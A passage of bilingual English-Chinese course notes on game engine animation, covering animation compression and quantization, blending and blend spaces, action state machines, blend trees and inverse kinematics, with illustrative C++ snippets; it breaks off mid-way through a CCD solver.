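    Quat interpolate(const Quat& a, Quat b, float t) {
        float c = dot(a, b);
        if (c < 0.0f) { b = { -b.w, -b.x, -b.y, -b.z }; c = -c; } // shortest path
        float wa, wb;
        if (c > 0.9995f) {                 // theta ~ 0: NLERP avoids zero-divide
            wa = 1.0f - t; wb = t;
        } else {                           // SLERP: constant angular speed
            const float theta = std::acos(c);
            wa = std::sin((1.0f - t) * theta) / std::sin(theta);
            wb = std::sin(t * theta) / std::sin(theta);
        }
        return normalize({ wa*a.w + wb*b.w, wa*a.x + wb*b.x,
                           wa*a.y + wb*b.y, wa*a.z + wb*b.z });
    }
    ```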

    Simple Animation Runtime Pipeline

    The posed transforms are computed on the CPU; the rest is handed off to the GPU.

    Animation Compression

    Animation Clip Storage

    • An animation clip is split into separate joint pose sequences

    • A joint pose sequence is split into separate translation, rotation and scale tracks

    Animation Data Size

    • Single clip size estimation

    E.g. a game containing over 150 unique characters (like League of Legends), each with 30 clips about 5 s long, takes roughly 1.26~2.51 GB.
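
    One way to reconstruct that figure (the per-frame parameters below are assumptions consistent with the stated range: 30 FPS sampling, 50~100 joints, and a 10-float TRS pose of 40 bytes per joint per frame):

    $$\text{frames}=150\ \text{characters}\times30\ \text{clips}\times5\ \text{s}\times30\ \text{fps}=675{,}000$$

    $$675{,}000\ \text{frames}\times(50\sim100\ \text{joints})\times40\ \text{B}\approx1.26\sim2.51\ \text{GB}$$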

    Distinction among Animation Tracks

    ​动画轨道的区别

    For the same joint, rotation, translation and scale changes vary greatly

    ​对于同一个关节,旋转、平移和尺度变化差别很大

    webp

    Distinction among Joints

    ​关节的区别

    webp

    The motion of different joints varies greatly

    ​不同关节的运动差异很大

    Simplest Compression - DoF Reduction

    ​最简单的压缩 - 自由度缩减(一般骨骼动画只有关节的旋转)

    • Scale

      缩放

      • Discard scale track (Usually not changed in humanoid skeleton except facial joints)

        丢弃比例轨迹(除面部关节外,人形骨骼中通常不会改变)

    • Translate

      平移

      • Discard translation track (Usually not changed in humanoid skeleton except the pelvis, facial joints and other special joints)

        丢弃平移轨迹(除了骨盆、面部关节和其他特殊部位外,人形骨骼中通常不改变)

    Keyframe

    webp

    A key frame (or keyframe) in animation and filmmaking is a drawing or shot that defines the starting and ending points of any smooth transition

    ​动画和电影制作中的关键帧是定义任何平滑过渡的起点和终点的绘图或镜头

    Keyframe Extraction - Linear Keys Reduction

    ​关键帧提取 - 线性关键点缩减

    webp

    ​Remove those frames which can be fitted by linear interpolation of adjacent frames

    ​删除那些可以通过相邻帧线性插值拟合的帧

    KeyFrame = {}
    for i = 1 to n-1 do
        // interpolate frame i from its neighbors (t = 0.5, assuming evenly spaced frames)
        frame_interp = Lerp(frame[i-1], frame[i+1], 0.5)
        error = Diff(frame[i], frame_interp)
        // keep frame i as a key frame only if interpolation cannot reproduce it
        if isNotAcceptable(error) then
            KeyFrame.insert(frame[i])
        end
    end

    Catmull-Rom Spline

    ​Catmull-Rom 样条线(有损压缩)

    webp

    Four control points $P_0$, $P_1$, $P_2$, $P_3$, will make a curve from $P_1$ to $P_2$

    ​四个控制点 $P_0$、$P_1$、$P_2$、$P_3$ 将形成一条从 $P_1$ 到 $P_2$ 的曲线

    • $\alpha$ : affects how sharply the curve bends at control points (usually $\alpha=0.5$)

      $\alpha$:影响曲线在控制点处的弯曲程度(通常$\alpha=0.5$)

    • $t$: the interpolation coefficient

      $t$:插值系数

    Interpolate on the curve with $t$ in range $(0,1)$

    ​在曲线上使用 $t$ 在 $(0,1)$ 范围内进行插值

    $$P(t)=[1\quad t\quad t^2\quad t^3]\begin{bmatrix}0&1&0&0\\-\alpha&0&\alpha&0\\2\alpha&\alpha-3&3-2\alpha&-\alpha\\-\alpha&2-\alpha&\alpha-2&\alpha\end{bmatrix}\begin{bmatrix}P_0\\P_1\\P_2\\P_3\end{bmatrix}$$
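
    ​按上面的基矩阵展开,可以写出如下求值示意代码(C++;Vec3 为演示用的假设类型,$\alpha$ 通常取 0.5):

    struct Vec3 { float x, y, z; };

    // P(t) = [1 t t^2 t^3] * M(alpha) * [P0 P1 P2 P3]^T,展开后得到四个控制点的权重
    Vec3 catmullRom(const Vec3& p0, const Vec3& p1, const Vec3& p2, const Vec3& p3,
                    float t, float alpha /* usually 0.5 */) {
        float t2 = t * t, t3 = t2 * t;
        float w0 = -alpha * t + 2.0f * alpha * t2 - alpha * t3;
        float w1 = 1.0f + (alpha - 3.0f) * t2 + (2.0f - alpha) * t3;
        float w2 = alpha * t + (3.0f - 2.0f * alpha) * t2 + (alpha - 2.0f) * t3;
        float w3 = -alpha * t2 + alpha * t3;          // 四个权重之和恒为 1
        return { w0 * p0.x + w1 * p1.x + w2 * p2.x + w3 * p3.x,
                 w0 * p0.y + w1 * p1.y + w2 * p2.y + w3 * p3.y,
                 w0 * p0.z + w1 * p1.z + w2 * p2.z + w3 * p3.z };
    }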

    webp

    Fitting Process

    • Make a Catmull-Rom spline with the middle 2 control points at both ends of the original curve

      制作一条 Catmull-Rom 样条线,中间 2 个控制点位于原始曲线的两端

    • Iteratively add control points like binary search

      像二分搜索一样迭代地添加控制点

    • Calculate inner curve by the closest 4 points

      通过最接近的 4 个点计算内曲线

    • Repeat until the error of each frame is under the threshold

      重复直到每帧的误差低于阈值

    Float Quantization

    Use less bits integer to represent limited range and accuracy float value

    ​使用较少位的整数来表示有限范围和精度的浮点值

    $$DesiredBits=\lceil\log_2\frac{Range}{Accuracy}\rceil$$

    Example Translation Range $[0, 10]$, Accuracy 0.001m:

    ​示例变换范围 $[0, 10]$,精度 0.001m:

    $$DesiredBits=\lceil\log_2\frac{10}{0.001}\rceil=14\ \mathrm{bits}$$

    In general, 16 bits can cover pose’s float range and accuracy requirements in the game engine

    ​一般来说,16 位可以覆盖游戏引擎中 pose 的浮动范围和精度要求

    Example of linear quantizing a 32-bit float to a 16-bit unsigned integer.

    ​将 32 位浮点数线性量化为 16 位无符号整数的示例
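
    ​线性量化/反量化的最小 C++ 示意如下(假设输入已被限制在给定范围内,65535 为 16 位无符号整数的最大值;仅作演示):

    #include <algorithm>
    #include <cstdint>

    // 把限定在 [min, max] 的 float 线性量化到 16 位无符号整数
    uint16_t quantizeFloat(float v, float min, float max) {
        float normalized = std::clamp((v - min) / (max - min), 0.0f, 1.0f);
        return static_cast<uint16_t>(normalized * 65535.0f + 0.5f); // 四舍五入
    }

    float dequantizeFloat(uint16_t q, float min, float max) {
        return min + (q / 65535.0f) * (max - min); // 最大误差约为 range/65535/2
    }

    // 例:平移范围 [0, 10] m 时精度约 10/65535/2 ≈ 0.000076 m,满足上文 0.001 m 的要求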

    webp

    Quaternion Quantization

    ​四元数量化

    • 3 numbers are enough to represent a unit quaternion, e.g. $q=(a,b,c,\sqrt{1-(a^2+b^2+c^2)})$

      3 个数字足以表示一个单位四元数,例如 $q=(a,b,c,\sqrt{1-(a^2+b^2+c^2)})$

    • The range of the rest 3 numbers can be limited to $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$, if we always omit the number with the largest absolute value

      其余 3 个数字的范围可以限制在 $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ 中,如果总是省略绝对值最大的数字

    $$a^2+b^2+c^2+d^2=1,\quad|a|\geq\max(|b|,|c|,|d|)$$

    $$2b^2\leq a^2+b^2\leq a^2+b^2+c^2+d^2=1$$

    $$b^2\leq\frac12\Rightarrow-\frac1{\sqrt2}\leq b\leq\frac1{\sqrt2}$$

    Similarly 类似地, $-\frac1{\sqrt{2}}\leq c\leq\frac1{\sqrt{2}}$ and $-\frac1{\sqrt{2}}\leq d\leq\frac1{\sqrt{2}}$

    webp

    • Use 2 bits to represent which number is discarded

      使用 2 位来表示哪个数字被丢弃

    • Use 15 bits storage for each number, ranged in $\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$, precision $\sqrt2/32767≈0.000043$

      每个数字使用 15 位存储,范围为$\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$,精度$\sqrt2/32767≈0.000043$

    • Finally a quaternion can be stored in 48 bits, cut down from 128 bits (see the sketch below)

      最终一个四元数可以用 48 位存储,从 128 位减少(见下方示意代码)
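
    ​“丢弃绝对值最大分量”的压缩思路可以写成如下 C++ 示意(打包布局是演示用的假设;解压时用 $d=\sqrt{1-a^2-b^2-c^2}$ 恢复被丢弃的分量):

    #include <array>
    #include <cmath>
    #include <cstdint>

    struct Quat48 { uint16_t a, b, c; }; // 3x16 位;两个高位合起来存“被丢弃分量”的 2 位索引

    // 把 [-1/sqrt(2), 1/sqrt(2)] 内的分量量化到 15 位
    static uint16_t quantize15(float v) {
        const float kRange = 0.70710678f;
        float n = (v + kRange) / (2.0f * kRange); // 映射到 [0, 1]
        return static_cast<uint16_t>(n * 32767.0f + 0.5f);
    }

    Quat48 compress(std::array<float, 4> q) { // q = {x, y, z, w},单位长度
        int largest = 0;
        for (int i = 1; i < 4; ++i)
            if (std::fabs(q[i]) > std::fabs(q[largest])) largest = i;
        if (q[largest] < 0.0f)                // q 与 -q 表示同一旋转,统一符号
            for (float& v : q) v = -v;
        uint16_t packed[3]; int k = 0;
        for (int i = 0; i < 4; ++i)
            if (i != largest) packed[k++] = quantize15(q[i]);
        // 把 2 位索引拆开,放进前两个 16 位数空出的最高位
        return { static_cast<uint16_t>(packed[0] | ((largest & 1) << 15)),
                 static_cast<uint16_t>(packed[1] | ((largest >> 1) << 15)),
                 packed[2] };
    }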

    Size Reduction from Quantization

    ​量化的尺寸减小

    webp

    • The key point of quantization is to find a proper error threshold, and use as few bits of storage as possible

      量化的关键是找到合适的误差阈值,并使用尽可能少的存储位

    • Keyframe extraction and quantization can be used together to obtain a better compression ratio

      关键帧和量化可以一起使用以获得更好的压缩比

    Error Propagation

    ​错误传播

    webp

    Error caused by compression of animation data will accumulate between bones

    ​动画数据压缩引起的误差会在骨骼之间累积

    • Bones store local space transformation data

      骨骼存储局部空间变换数据

    • Bones are organized in a hierarchy

      骨骼按层次结构组织

    Joint Sensitivity to Error

    ​关节对误差的敏感性

    Some special parts require high precision animation.

    ​一些特殊部位需要高精度的动画。

    webp

    ​由动画有损压缩导致的动画错误。

    Measuring Accuracy - Data Error

    ​测量精度 - 数据误差

    webp

    Calculate the error as the difference between the interpolated transform data and the original

    ​用插值变换数据与原始数据之间的差来计算误差

    • Translation Error: $||T_1-T_2||$
    • Rotation Error: $||R_1-R_2||$
    • Scale Error: $||S_1-S_2||$

    Measuring Accuracy - Visual Error

    ​测量精度 - 视觉误差

    webp

    Calculate the error as the difference between the interpolated vertex and the desired vertex

    ​用插值顶点与目标顶点之间的差来计算误差

    webp

    Hard to calculate the visual error of every vertex

    ​很难计算每个顶点的视觉误差

    • Great amount of calculation

      计算量大

    Estimate the visual error

    ​估计视觉误差

    • Fake vertex: Two orthogonal virtual vertices at a fixed distance from the joint (not co-linear with the joint rotation axis)

      假顶点:距关节固定距离的两个正交虚拟顶点(与关节旋转轴不共线)

    • Fake Vertex Distance Approximation

      假顶点距离近似

      • character bones 2~10cm

        人物骨头 2~10 厘米

      • large animated objects 1~10m

        大型动画物体 1~10m

    Error Compensation - Adaptive Error Margins

    ​误差补偿 - 自适应误差裕度

    webp

    • Adaptive Error Margins

      自适应误差容限

      • Use different accuracy thresholds for different joints from end to root, in order to reduce error caused by parent joints

        对从末端到根部的不同关节使用不同的精度阈值,以减少父关节引起的误差

    Error Compensation - in Place Correction

    ​误差补偿 - 就地校正

    webp

    • Process

      过程

      • Select a point on every bone except root

        在除根部之外的每个骨骼上选择一个点

      • Compute the rotation of every compressed bone from root that takes the tagged point closest to its actual position in model space

        计算从根部开始的每个压缩骨骼的旋转,使标记点最接近其在模型空间中的实际位置

      • Add the rotation to transform of compressed data

        添加旋转来转换压缩数据

    • Pros

      优点

      • No overhead during decompression, since all data is already computed during compression

        解压期间没有开销,因为所有数据已在压缩期间计算

    • Cons

      缺点

      • May produce memory overhead because of possible modification to ConstantTrack

        由于可能对 ConstantTrack 进行修改,可能会产生内存开销

      • May produce NoiseTrack because it directly changes keyframe data

        可能会产生 NoiseTrack,因为它直接更改关键帧数据

      • Compression may cost more time

        压缩可能会花费更多时间

    Animation DCC Process

    In general, the Animation DCC (Digital Content Creation) process includes:

    ​一般来说,动画 DCC(数字内容创建)过程包括:

    • Mesh

      网格

    • Skeleton binding

      骨骼绑定

    • Skinning

      蒙皮

    • Animation creation

      制作动画

    • Exporting

      输出

    Mesh building

    webp

    • Blockout Stage: Create a rough outline of the character

      草图阶段:创建角色的粗略轮廓

    • High Poly Stage: improve the building precision

      高多边形阶段:提高模型精度

    • Low Poly Stage: Divide the surface into meshes

      低多边形阶段:将表面划分为网格

    • Texture Stage: Add texture to character

      纹理阶段:为角色添加纹理

    Mesh Adjustment for Animation

    ​动画的网格调整

    webp

    • Mesh dividing is vital for animation creating, it defines how the skin curves

      网格划分对于动画创建至关重要,它定义了皮肤的弯曲方式

    • Animation turns to be weird if the meshes are too sparse

      如果网格太稀疏,动画会变得很奇怪

    • Dense meshes cause a performance overhead

      密集的网格会导致性能开销

    Exporting

    webp

    • FBX file
      • Model mesh
      • skeleton
      • skinning data
      • animation clip

    FBX: the industry-standard 3D asset exchange file format for games. It is developed by Autodesk as a proprietary format.

    ​FBX:游戏的行业标准 3D 资产交换文件格式。它是由 Autodesk 开发的专有格式。

    第九节:高级动画技术:动画树、IK 和表情动画

    Animation System

    Advanced Animation Technology

    ​高级动画技术

    How to Achieve the Animation Effect in Real Game?

    ​如何实现真实游戏中的动画效果?

    webp

    ​将动画师制作的各种 simple animation clips 混合成 complex animations。

    Animation Blending

    • The term animation blending refers to any technique that allows more than one animation clip to contribute to the final pose of the character

      术语“动画混合”是指允许多个动画剪辑为角色的最终姿势做出贡献的任何技术

    Case: Walking to Running

    webp

    • Assume the character walks at 1.5m/s and runs at 3.0m/s in our game

      假设角色在我们的游戏中以 1.5m/s 的速度行走并以 3.0m/s 的速度奔跑

    • As the character’s speed increase, we want to switch its animation from walking to running

      随着角色速度的增加,我们希望将其动画从步行切换为跑步

    Math of Blending: LERP

    webp

    Use LERP to get intermediate frame from poses of different clips

    ​使用 LERP 从不同剪辑的姿势中获取中间帧

    The weight is controlled by game parameters, e.g. character speed

    ​混合权重由游戏参数(如角色速度)控制

    Calculate Blend Weight

    ​计算混合权重(依据速度)

    参数 | 描述
    $\text{speed}_{\text{current}}$ | current speed
    $\text{speed}_{\text{1}}$ | speed of clip1
    $\text{speed}_{\text{2}}$ | speed of clip2
    $\text{weight}_1$ | calculated weight of clip1
    $\text{weight}_2$ | calculated weight of clip2

    $$weight_1=\frac{speed_{current}-speed_2}{speed_1-speed_2}$$

    $$\mathrm{weight}_2=\frac{\mathrm{speed}_{current}-\mathrm{speed}_1}{\mathrm{speed}_2-\mathrm{speed}_1}$$
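
    ​上面的权重公式落到代码里大致如下(C++ 示意;例中的 clip 速度数值只是假设):

    #include <algorithm>

    struct BlendWeights { float weight1, weight2; };

    // speed1/speed2 为两个 clip 的移动速度(假设 speed1 < speed2)
    BlendWeights calcBlendWeights(float speedCurrent, float speed1, float speed2) {
        float weight1 = (speedCurrent - speed2) / (speed1 - speed2);
        weight1 = std::clamp(weight1, 0.0f, 1.0f); // 当前速度夹在 [speed1, speed2] 内
        return { weight1, 1.0f - weight1 };
    }

    // 例:行走 1.5 m/s、奔跑 3.0 m/s、当前 2.0 m/s:
    // calcBlendWeights(2.0f, 1.5f, 3.0f) -> weight1 ≈ 0.667, weight2 ≈ 0.333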

    Align Blend Timeline

    ​对齐混合时间线

    webp

    Case: Walking to Running

    In order to achieve the desired effect, we need a lot of animation clips with intermediate speeds.

    ​为了达到想要的效果,我们需要大量中等速度的动画片段。

    Let the animators produce a whole bunch?

    ​让动画师制作一大堆?(这是不可能的)

    Blend Space

    ​混合空间

    1D Blend Space: Directional Movement

    ​一维混合空间:定向运动

    webp

    Players can move forward from multiple angles

    ​玩家可以从多个角度前进

    We can blend any angle from three clips:

    ​我们可以混合三个剪辑中的任意角度:

    • Strafe Left clip
    • Run Forward clip
    • Strafe Right clip

    The technique is called 1D Blend Space.

    ​该技术称为一维混合空间。

    Directional Walking and Running

    ​定向步行和跑步

    webp

    Players can change direction and speed at the same time

    ​玩家可以同时改变方向和速度

    We simply place the two 1D Blend Spaces orthogonally and we get an 2D Blend Space

    ​我们只需将两个一维混合空间正交放置,就得到一个二维混合空间

    2D Blend Space

    webp

    Since the movement speed in the lateral direction is lower than in the forward direction, the character should enter the running state at a lower speed in the lateral direction

    ​由于横向移动速度在前进方向上较低,因此角色应该以较低的横向速度进入奔跑状态

    Case: Applauding on Different Poses

    ​案例:不同姿势鼓掌

    webp

    There are multiple robots in different poses in the scene

    ​场景中有多个机器人摆出不同的姿势

    We need to make applause animations for various poses separately

    ​我们需要分别为各种姿势制作掌声动画

    Is it possible to make a single applauding animation that can be applied to all poses?

    ​是否可以制作一个可以应用于所有姿势的鼓掌动画?

    Skeleton Masked Blending

    ​骨架蒙版混合

    webp

    The set of all blend percentages for the entire skeleton $\{\beta_j\}|^{N-1}_{j=0}$ is sometimes called a blend mask $b$

    ​整个骨架的所有混合百分比的集合 $\{\beta_j\}|^{N-1}_{j=0}$ 有时称为混合蒙版 $b$
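
    ​蒙版混合的骨架代码大致如下(C++ 示意;JointPose 这里被简化成只含平移,实际姿势还包含旋转和缩放):

    #include <cstddef>
    #include <vector>

    struct JointPose { float tx, ty, tz; }; // 演示用的简化姿势:仅平移

    static JointPose lerpPose(const JointPose& a, const JointPose& b, float alpha) {
        return { a.tx + alpha * (b.tx - a.tx),
                 a.ty + alpha * (b.ty - a.ty),
                 a.tz + alpha * (b.tz - a.tz) };
    }

    // blendMask[j] = beta_j:0 保留 base 姿势,1 取 overlay 姿势,
    // 于是上半身关节可以鼓掌,而下半身保持原有姿势
    void maskedBlend(const std::vector<JointPose>& base,
                     const std::vector<JointPose>& overlay,
                     const std::vector<float>& blendMask,
                     std::vector<JointPose>& out) {
        for (std::size_t j = 0; j < base.size(); ++j)
            out[j] = lerpPose(base[j], overlay[j], blendMask[j]);
    }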

    Case: Warm Welcome from the Robots

    ​案例:机器人的热烈欢迎

    webp

    We will let robots applaud in different poses

    ​我们会让机器人以不同的姿势鼓掌(用蒙版结合两个动画 clips)

    Additive Blending

    webp

    Add a difference clip into a regular clip to produce a new clip

    ​将差异剪辑添加到常规剪辑中以生成新剪辑

    Additive Blending introduces a new kind of animation called a difference clip, which represents the difference between two regular animation clips.

    ​加法混合引入了一种称为差异剪辑的新型动画,它表示两个常规动画剪辑之间的差异。

    A difference clip can be added into a regular animation clip in order to produce interesting variations in the pose and movement of the character.

    ​可以将差异剪辑添加到常规动画剪辑中,以便在角色的姿势和运动中产生有趣的变化。

    Nodding to Camera

    webp

    ​朝向摄像机点头的动画。

    Additive Blending - Abnormal Bone Results

    ​加法混合 - 骨骼结果异常

    webp

    Additive blends are more likely to produce abnormal bone results

    ​加法混合更有可能产生异常的骨骼结果

    Animation Blending Summary

    ​动画混合总结

    webp

    • 1D Blend Space

      一维混合空间

      • Blend poses based on a single input value

        基于单个输入值混合姿势

    • 2D Blend space

      • Blend poses based on two input values

        基于两个输入值混合姿势

      • Triangular blend

        三角形混合

    • Masked Blending

      蒙版混合

    • Additive Blending

      加法混合

    Action State Machine (ASM)

    ​动作状态机(ASM)

    Case: Jumping

    webp

    How to animate jump?

    ​如何制作跳跃动画?

    Blend Space is synchronous, but jump is stateful

    ​混合空间是同步的,但跳跃是有状态的

    We usually model the jumping action via a finite state machine, commonly known as the Action State Machine (ASM)

    ​我们通常通过有限状态机(通常称为动作状态机(ASM))来模拟跳跃动作

    ASM Definition

    ​ASM 定义

    webp

    • ASM consists of nodes and transitions

      ASM 由节点和转换组成

    • Node types

      节点类型

      • Blend space

        混合空间

      • Clip

        片段

    class ActionStateMachineClipNode
    {
        AnimationClip m_clip;     // the clip this state plays
        bool          m_is_loop;
    };

    class ActionStateMachineBlendSpaceNode
    {
        BlendSpace m_blend_space; // a blend space can also be a state node
        bool       m_is_loop;
    };
    • Transition type

      过渡型

      • simply "pop" from one state to another

        只需从一种状态“弹出”到另一种状态

      • cross-fade from one state to the next

        从一种状态交叉淡入淡出到另一种状态

      • Special transitional states

        特殊过渡状态

    Cross Fades

    ​交叉淡入淡出

    webp

    Two common ways

    ​两种常见方式

    • Smooth transition

      平稳过渡

      • restriction: the two clips must be looping animations, and their timelines must be synchronized

        限制:两个剪辑必须是循环动画,并且它们的时间线必须同步

    • Frozen transition

      冻结过渡

    Cross Fades Curve

    webp

    Different cross fades curve could be used for different demands

    ​不同的交叉淡入淡出曲线可用于不同的需求

    Animation State Machine in Unreal

    ​虚幻中的动画状态机

    webp

    • State: a blueprint graph which outputs a pose

      状态:输出姿势的蓝图

    • Transition : control when to change state and how to blend (Multi)

      过渡:控制何时改变状态以及如何混合(多)

    Layered ASM

    ​分层状态机

    webp

    Allows different parts of a character's body to be doing different, independent or semi-independent actions simultaneously

    ​角色身体的不同部位同时做不同的、独立或半独立的动作

    Animation Blend Tree

    ​现代游戏引擎常用的方法——动画混合树

    Blend Tree

    ​混合树

    webp

    Structure layered ASMs and operations as a tree

    ​将分层 ASM 和操作构建为树

    • Inspired by expression tree

      受到表达式树的启发

    • Easy to understand for animators

      动画师易于理解

    For a blend tree

    ​对于混合树

    • Non-terminal nodes and terminal nodes (leaf nodes)

      非终端节点和终端节点(叶节点)

    • The result of each non-terminal node is a pose

      每个非终端节点的结果是一个位姿

    LERP Blend Node

    ​LERP 混合节点

    webp

    • Binary LERP node

      二元 LERP 节点

      • Basic non-terminal node in blend tree

        混合树中的基本非终端节点

      • LERP two input poses with weight $\beta$ into one output pose

        LERP 将权重 $\beta$ 的两个输入姿势转化为一个输出姿势

    Usually extended to handle multiple inputs (e.g. Ternary/Quad LERP node)

    ​通常扩展为处理多个输入(例如三元/四元 LERP 节点)

    Additive Blend Node

    ​加法混合节点

    webp

    • Basic non-terminal node in blend tree

      混合树中的基本非终端节点

    • Add the second input pose (usually a difference one) into the first input pose by weight $\beta$

      按权重 $\beta$ 将第二个输入姿势(通常是差异姿势)添加到第一个输入姿势中

    Express Layered ASM in Blend Tree

    ​在混合树中表达分层 ASM

    webp

    Use a blend tree to describe the desired final pose of ASMs

    ​使用混合树来描述 ASM 所需的最终姿态

    Blend Tree Nodes

    ​混合树节点

    webp

    Terminal node (Leaf Nodes)

    ​终端节点(叶节点)

    • Clip
    • Blend Space
    • ASM

    Non-terminal nodes (Non-Leaf Nodes)

    ​非终端节点(非叶节点)

    • Binary LERP blend node

      二元 LERP 混合节点

    • Ternary (triangular) LERP blend node

      三元(三角形)LERP 混合节点

    • Binary additive blend node

      二元加法混合节点

    Unreal Animation Blueprint

    ​虚幻动画蓝图

    webp

    A blueprint graph which outputs a final pose

    ​输出最终姿势的蓝图

    • Take clip poses or the results of ASMs as input

      将剪辑姿势或 ASM 结果作为输入

    • Blend input poses by different methods

      通过不同的方法混合输入姿势

    Blend Tree Control Parameters

    ​混合树控制参数

    • node search

      节点搜索

      provide a way for higher-level code to find blend nodes in the tree

      为高层代码提供一种在树中查找混合节点的方法

    • named variable

      命名变量

      allow names to be assigned to the individual control parameters. The controlling code can look up a control parameter by name in order to adjust its value

      允许为各个控制参数分配名称。控制代码可以通过名称查找控制参数以调整其值

    • control structure

      控制结构

      a simple data structure, contains all of the control parameters for the entire character. The nodes in the blend tree(s) are connected to particular control parameters

      一个简单的数据结构,包含整个角色的所有控制参数。混合树中的节点连接到特定的控制参数

    Animation blend trees in real engines are way more complicated than these classic nodes (i.e., event nodes, calculation/logic nodes and special blending and flow control nodes)

    ​实际引擎中的动画混合树比这些经典节点(即事件节点、计算/逻辑节点以及特殊混合和流程控制节点)要复杂得多。

    Unreal Animation Blueprint Control

    ​虚幻动画蓝图控制

    webp

    Named variables as members in animation blueprint

    ​命名变量作为动画蓝图中的成员

    • Can be updated through blueprint

      可以通过蓝图进行更新

    • Can be used anywhere inside the Blend Tree

      可以在混合树内的任何地方使用

    Unreal5 Animation Tree Sample

    webp

    Inverse Kinematics (IK)

    ​逆运动学 (IK)

    Basic Concepts

    webp

    • End-effector

      末端执行器

      The bone which is expected to be moved to a desired position

      预计将移动到所需位置的骨骼

    • IK (Inverse Kinematics)

      IK(逆运动学)

      The use of kinematic equations to determine the joint parameters of a manipulator so that the end-effector moves to a desired position

      利用运动学方程确定机械手的关节参数,使末端执行器移动到所需位置

    • FK (Forward Kinematics)

      FK(正向运动学)

      The use of the kinematics equations of a robot to compute the position of the end-effectors from specified values for the joint parameters

      使用机器人的运动学方程根据关节参数的指定值计算末端执行器的位置

    How to Touch the Ground?

    webp

    ​让角色踏入凹凸不平的地面时,脚能正确踏在地面上。

    Intuitive Idea: Adjust Feet Position for Each Step

    ​直观想法:每一步调整脚的位置

    Two Bones IK

    webp

    ​在脚和地面之间建立 IK 约束(见下方示意代码)。

    • 3D space

    webp

    • Determine the final pose by a reference vector

      通过参考向量确定最终姿态

    webp
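
    ​两骨 IK 的核心是余弦定理。下面的 C++ 示意只求弯曲平面内的两个角度(大腿长 l1、小腿长 l2、根关节到目标的距离 d);用参考向量确定弯曲平面、再换算成关节旋转的部分从略,属于演示用的假设:

    #include <algorithm>
    #include <cmath>

    struct TwoBoneAngles {
        float upperAngle; // 根关节处,骨骼 1 与“根->目标”连线之间的夹角
        float lowerAngle; // 中间关节(如膝盖)处的内角
    };

    TwoBoneAngles solveTwoBoneIK(float l1, float l2, float targetDist) {
        // 先把目标距离夹到可达范围 [|l1-l2|, l1+l2] 内
        float d = std::clamp(targetDist, std::fabs(l1 - l2) + 1e-4f, l1 + l2 - 1e-4f);
        // 余弦定理:d^2 = l1^2 + l2^2 - 2*l1*l2*cos(lowerAngle)
        float cosLower = (l1 * l1 + l2 * l2 - d * d) / (2.0f * l1 * l2);
        // 再用一次余弦定理求骨骼 1 相对“根->目标”连线的偏角
        float cosUpper = (l1 * l1 + d * d - l2 * l2) / (2.0f * l1 * d);
        return { std::acos(std::clamp(cosUpper, -1.0f, 1.0f)),
                 std::acos(std::clamp(cosLower, -1.0f, 1.0f)) };
    }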

    More Complicated IK Scenarios

    ​更复杂的 IK 场景

    webp

    Complexity of Multi-Joint IK Solving

    ​多关节 IK 求解的复杂性

    webp

    • Computation cost: high dimension non-linear function solving in real-time

      计算成本:实时求解高维非线性函数

    • May have multiple solutions, a unique solution or no solution

      可能有多种解决方案、唯一解决方案或无解决方案

    Check Reachability of the Target

    ​检查目标的可达性

    webp

    Constraints of Joints

    webp

    ​人体的关节有多种,不同的关节能做出不同范围的变换。

    ​哦!游戏引擎开发者还要对解剖学有所涉猎。

    Need Treat Constraints Seriously

    ​需要认真对待约束

    webp

    ​约束不充分,游戏中出现反关节运动。

    Heuristic Algorithms

    ​启发式算法

    Why

    • Too many joints + constraints, difficult to solve with analytical methods

      关节 + 约束过多,难以用分析方法解决

    Basic Idea

    ​基本思想

    Designed to solve problem in faster and more efficient fashion by sacrificing optimality, accuracy, precision, or completeness for speed

    ​旨在通过牺牲最优性、准确性、精密度或完整性来换取速度,以更快、更高效的方式解决问题

    • Approximation

      近似值

    • Global optimality is not guaranteed

      不保证全局最优

    • Iteration is usually used with a maximum limit

      迭代通常使用最大限制

    CCD (Cyclic Coordinate Descent)

    ​CCD(循环坐标下降)

    Principle

    • From joint to joint, rotates the end-effector as close as possible to the target; solves the IK problem in orientation space

      从关节到关节,旋转末端执行器使其尽可能靠近目标,在方向空间中求解 IK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    Contraints

    ​限制条件

    • Angular limits are allowed, by checking after each iteration (see the sketch below)

      通过在每次迭代后检查,可以支持角度限制(见下方示意代码)
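
    ​一个位置形式的 CCD 最小 C++ 示意(非权威实现):Vec3 及其辅助函数是演示用的简化数学库;按上文所述,关节角度限制的检查应放在每次旋转之后,这里仅以注释标出。

    #include <cmath>
    #include <vector>

    struct Vec3 { float x, y, z; };
    static Vec3 sub(Vec3 a, Vec3 b) { return { a.x - b.x, a.y - b.y, a.z - b.z }; }
    static Vec3 add(Vec3 a, Vec3 b) { return { a.x + b.x, a.y + b.y, a.z + b.z }; }
    static Vec3 cross(Vec3 a, Vec3 b) {
        return { a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y - a.y * b.x };
    }
    static float dot(Vec3 a, Vec3 b) { return a.x * b.x + a.y * b.y + a.z * b.z; }
    static float len(Vec3 a) { return std::sqrt(dot(a, a)); }
    static Vec3 norm(Vec3 a) { float l = len(a); return { a.x / l, a.y / l, a.z / l }; }

    // Rodrigues 公式:把点 p 绕过原点的单位轴 axis 旋转 angle
    static Vec3 rotate(Vec3 p, Vec3 axis, float angle) {
        float c = std::cos(angle), s = std::sin(angle), kdp = dot(axis, p);
        Vec3 kxp = cross(axis, p);
        return { p.x * c + kxp.x * s + axis.x * kdp * (1 - c),
                 p.y * c + kxp.y * s + axis.y * kdp * (1 - c),
                 p.z * c + kxp.z * s + axis.z * kdp * (1 - c) };
    }

    void solveCCD(std::vector<Vec3>& joints, Vec3 target,
                  int maxIterations, float tolerance) {
        int end = static_cast<int>(joints.size()) - 1;  // 末端执行器下标
        for (int it = 0; it < maxIterations; ++it) {
            for (int i = end - 1; i >= 0; --i) {        // 从靠近末端的关节走向根部
                Vec3 toEnd = norm(sub(joints[end], joints[i]));
                Vec3 toTarget = norm(sub(target, joints[i]));
                Vec3 axis = cross(toEnd, toTarget);
                float axisLen = len(axis);
                if (axisLen < 1e-6f) continue;          // 已对齐,跳过
                float cosA = std::fmax(-1.0f, std::fmin(1.0f, dot(toEnd, toTarget)));
                float angle = std::acos(cosA);
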